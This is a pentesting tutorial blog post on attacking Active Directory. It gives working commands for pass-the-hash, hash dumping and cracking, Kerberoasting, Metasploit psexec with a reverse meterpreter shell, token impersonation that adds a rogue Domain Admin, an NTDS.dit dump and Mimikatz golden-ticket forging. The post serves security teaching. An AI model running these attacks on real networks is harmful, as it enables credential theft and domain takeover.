Hacking Active Directory: From Reconnaissance to Exploitation -Part 2

source: https://cybergladius.com/ad-hardening-against-kerberos-golden-ticket-attack/

Welcome back! This blog is a continuation of my first Active Directory pentesting article. In the first part, we covered the initial steps of AD pentesting:

1. Getting Initial Access 🚪: We discussed various attack techniques to obtain your first credentials for compromising AD, including:

• LLMNR (Link-Local Multicast Name Resolution).
• SMB Relay.
• IPv6 DNS Takeover.

1. Enumeration 🔍: We explored two essential tools, Bloodhound and MMC, for enumerating AD.

If you missed the first part, you can check it out here: Hacking Active Directory: From Reconnaissance to Exploitation — Part 1

In this blog, we’ll delve into the next steps after enumeration:

1. Lateral Movement and Exploitation 🔄💥
2. Persistence in AD 🛡️

Let’s continue our journey into the world of AD pentesting! 🚀

Step 3: Moving Laterally and Exploiting ⬅️➡️

Lateral movement refers to the techniques used by attackers to navigate through a network after gaining initial access. The goal is to move from one system to another, often escalating privileges along the way, to reach valuable assets or sensitive data. This process involves exploiting various network vulnerabilities, using legitimate credentials, and leveraging tools to maintain stealth and avoid detection.

In this step, we will present various tools that you can use to move laterally within the network and perform Active Directory exploitation.

PASS ATTACK

A pass attack involves using the same credentials across multiple machines to determine if they are reused and to exploit this reuse if it exists. There are two main types of pass attacks:

a. Pass-the-Password: This technique involves capturing and using plaintext passwords to authenticate across different machines. If a user’s password is reused on multiple systems, this attack allows an attacker to gain access to all those systems.

b. Pass-the-Hash: This technique involves capturing hashed passwords (such as NTLM hashes) and using them to authenticate without needing to crack them. By “passing” the hash directly to network services, attackers can impersonate the user and move laterally across the network, accessing resources with the same privileges as the compromised user.

Both of these attack methods take advantage of credential reuse and weak authentication practices, making it crucial to use unique, strong passwords and to implement additional security measures.

How to perform it ?

To perform Pass-the-Password or Pass-the-Hash, we will use crackmapexectool :

 crackmapexec smb 192.168.134.0/24 -u username -d ADPENTT.local -p plaintext_pass
# OR:
 crackmapexec smb 192.168.134.0/24 -u username -H hash_of_pass

As you can see from the screenshot above, we achieved a successful login on three different machines.

crackmapexec can also be used for various enumeration tasks, such as enumerating SMB shares, SAM hashes, LSA secrets, etc. Below is an example of how to list SMB shares using crackmapexec:

Furthermore, crackmapexec allows us to access its database, which is built from the results of running crackmapexec with various options. The creds command is handy for reviewing where the provided credentials have been successful, including the specific domains and usernames.

Below is an example of the output from the creds command, illustrating how it can be used to verify the effectiveness of the credentials across different systems:

Once we have identified the list of machines that share the same credentials provided to CrackMapExec, we can proceed to dump and crack new hashes. For this purpose, we will use secretsdump.py.

We will run secretsdump.py on each machine from the list, one by one, to see if we can extract new hashes:

secretsdump.py ADPENTT.local/username:'plain_text_pass'@Host_IP_ADDR

#OR: 
secretsdump.py username:@Host_IP_ADDR -hashes hash_of_pass

Below is an example of the hashes retrieved after running secretsdump.py on the vulnerable machines:

To crack the retrieved hashes, we can first use hash-identifier to determine the type of hash. Once identified, we can use hashcat to crack the hash:

hash-identifier hash_of_pass
hashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt
# -m: 100 used for NTLM hashes

KERBEROASTING

A Kerberoasting attack is a type of cyberattack targeting the Kerberos authentication protocol used in Active Directory environments.

How does it work?

source: https://www.wallarm.com/what/kerberoasting-attack

This above schema illustrates the Kerberos authentication process in an Active Directory environment. Here’s a brief explanation of each action:

1. AS-REQ (Authentication Service Request):

The user’s workstation sends a request to the Domain Controller (DC) for a Ticket Granting Ticket (TGT). This request includes the user’s credentials.

2. AS-REP (Authentication Service Reply):

The Domain Controller verifies the user’s credentials. If valid, it sends back a TGT to the user’s workstation. The TGT is encrypted with the user’s password hash.

3. TGS-REQ (Ticket Granting Service Request):

The user’s workstation presents the TGT to the Domain Controller and requests a Ticket Granting Service (TGS) ticket for accessing a specific service on the application server.

4. TGS-REP (Ticket Granting Service Reply):

The Domain Controller sends back the TGS ticket to the user’s workstation. This ticket is encrypted with the service account’s password hash.

5. AP-REQ (Application Request):

The user’s workstation presents the TGS ticket to the application server to gain access to the desired service.

6. AP-REP (Application Reply) (Optional):

If mutual authentication is required, the application server sends back a response to the user’s workstation, confirming the identity of the server.

Optional Actions between Domain Controller and Application Server:

PAC Validation Request/Response:

The application server can optionally validate the Privilege Attribute Certificate (PAC) with the Domain Controller to ensure the user’s privileges are correct and up-to-date.

In a Kerberoasting attack, an attacker requests service tickets (TGS) for service accounts, which are then encrypted with the service account’s password hash. The attacker can capture these tickets and attempt to crack the encryption offline to reveal the plaintext password of the service account. This type of attack exploits weak service account passwords and can lead to further privilege escalation within the network.

How to perform it ?

To get the TGS hash, we will use a tool called GetUserSPNs.py :

GetUserSPNs.py ADPENTT.local/username:password -dc-ip DC_iP_ADDR -request 

Note: In Active Directory, Service Principal Names (SPNs) are unique identifiers for services running on servers. They are used by the Kerberos authentication protocol to associate a service instance with a service logon account, enabling clients to authenticate to the service securely.

In the screenshot above, the TGS hash is highlighted with a yellow frame. We can then use Hashcat to crack the extracted hash:

hashcat -m 13100 krb.txt /usr/share/wordlists/rockyou.txt 

TOKEN IMPERSONATION

In computing, a token is a piece of data that represents the security context of a user or process, containing information such as user privileges and group memberships. It is used to control access to resources and perform actions under the assigned permissions of the user or process.

A token impersonation attack involves an attacker capturing and using a security token of a legitimate user to gain unauthorized access to resources.

There is 2 types of token in the context of Windows seurity :

Delegate Token: This allows a process to impersonate a user’s security context across multiple machines within a network.

Impersonate Token: This allows a process to temporarily assume the security context of another user, but only on the local machine.

How to perform it ?

To perform this attack, we will use the PsExec exploit available in Metasploit. The use exploit/windows/smb/psexec Metasploit exploit leverages the SMB (Server Message Block) protocol to execute commands on a remote Windows machine. By using valid credentials, it employs the PsExec utility to gain remote code execution, allowing the attacker to run arbitrary commands or deploy payloads on the target system.

To launch this exploit, we will run the following commands:

>msfconsole
>search psexec
>use exploit/windows/smb/psexec 
>set payload windows/x64/meterpreter/reverse_tcp 

Once we launch the script, we will obtain a Meterpreter session, providing us with remote access to the target system.

meterpreter> shell

Then, we will use the “incognito” module to impersonate tokens :

meterpreter> load incognito
#We can load other modules by typing load and then pressing "Tab" twice to see available options.
list_tokens -u  # To list user tokens 
list_tokens -g  # To list group tokens

Now, we will impersonate an admin token and create a new domain admin user:

meterpreter> impersonate_token adpentt\administrator
meterpreter> shell
net user /add username user_pass /domain
net group  "Domain Admins" username /ADD /DOMAIN

DUMPING NTDS.dit

NTDS (NT Directory Services) refers to the Active Directory database file, typically named ntds.dit, which stores all the Active Directory data, including user and group information, credentials, and other directory objects.

How to perform it ?

To dump the ntds.dit file, we will use the secretsdump.py tool.

 secretsdump.py ADPENTT.local/username:'user_pass'@DC_IP_ADDR -just-dc-ntlm 

Note: ensure that username is an account with administrative privileges on the domain controller.

Step 4: Persisting in Active Directory 🔗

There are many types of attacks that can be used to maintain access in a compromised Active Directory (AD). In this part, we will focus on the Golden Ticket attack.

GOLDEN TICKET ATTACK

A Golden Ticket attack is a type of cyberattack where an attacker forges a Kerberos Ticket Granting Ticket (TGT) using the compromised password hash of a Key Distribution Center (KDC) service account, typically the krbtgtaccount. This forged TGT allows the attacker to impersonate any user and access any resource within the Active Directory environment, effectively granting them unrestricted and persistent access to the domain. This attack exploits the trust within the Kerberos authentication system and can remain undetected for a long period.

How to perfom it ?

At this stage, we have already compromised a user account, moved laterally, and gained access to the Domain Controller (DC). Next, we will use the Mimikatz tool on the DC to steal the password hash of the krbtgt account and create a Golden Ticket:

1. Download Mimikatz from the GitHub repository: https://github.com/gentilkiwi/mimikatz.git

2. Open Command Prompt with administrative rights on the DC and run mimikatz.exe.

3. Run the following command in Mimikatz:

privilege::debug 
#to grants the Mimikatz tool the necessary permissions to perform advanced tasks that are typically restricted to administrators or system processes.
lsadump::lsa /inject /name:krbtgt

lsadump::lsa: Dumps the Local Security Authority (LSA) secrets, which can include sensitive information such as password hashes and Kerberos tickets.

/inject: Injects the process into the LSA service to obtain these secrets.

/name:krbtgt: Targets the specific krbtgt account.

Then we will create a forged Kerberos Ticket Granting Ticket (TGT) for the specified user (Administrator) in the given domain and inject it into the current session. This allows the attacker to impersonate the Administrator and gain unrestricted access to resources within the domain.

kerberos::golden  /User:Administrator /domain:adpentt.local /sid:S-1-5-21-527687875-826702742-2417181359 /krbtgt:590d534c15c13980a6d41c34d8ab9f03 /id:500 /ptt

kerberos::golden: Invokes the Golden Ticket creation module in Mimikatz.

/User:Administrator: Specifies the username for the ticket (it's not mandatory to use the Admin account).

/domain:adpentt.local: Specifies the domain name for which the Golden Ticket will be created.

/sid:S-1-5-21-527687875-826702742-2417181359: Specifies the Security Identifier (SID) of the domain.

/krbtgt:590d534c15c13980a6d41c34d8ab9f03: Provides the NTLM hash of the krbtgt account password.

/id:500: Specifies the RID (Relative Identifier) for the user account, with 500 typically being the RID for the built-in Administrator account.

/ptt: "Pass The Ticket" - This option injects the generated ticket directly into the current session.

From this same session, we will open a cmd while retaining the session’s ticket. This will allow us to access any computer within the domain:

misc::cmd

With the Golden Ticket in place, we can perform multiple actions. In the example below, i have listed the content of the C drive of the specified machine:

Then i have used PsExec.exe to access to the cmd of the specified machine:

That’s all for this second part of the Hacking Active Directory blog. 🚀 We explored various types of attacks that can be performed to move laterally and exploit Active Directory. Finally, we presented the methodology for performing a Golden Ticket attack to maintain access within AD. I hope you found this information helpful! 😊

Stay tuned for more insights and techniques in my next post! 🔐👨‍💻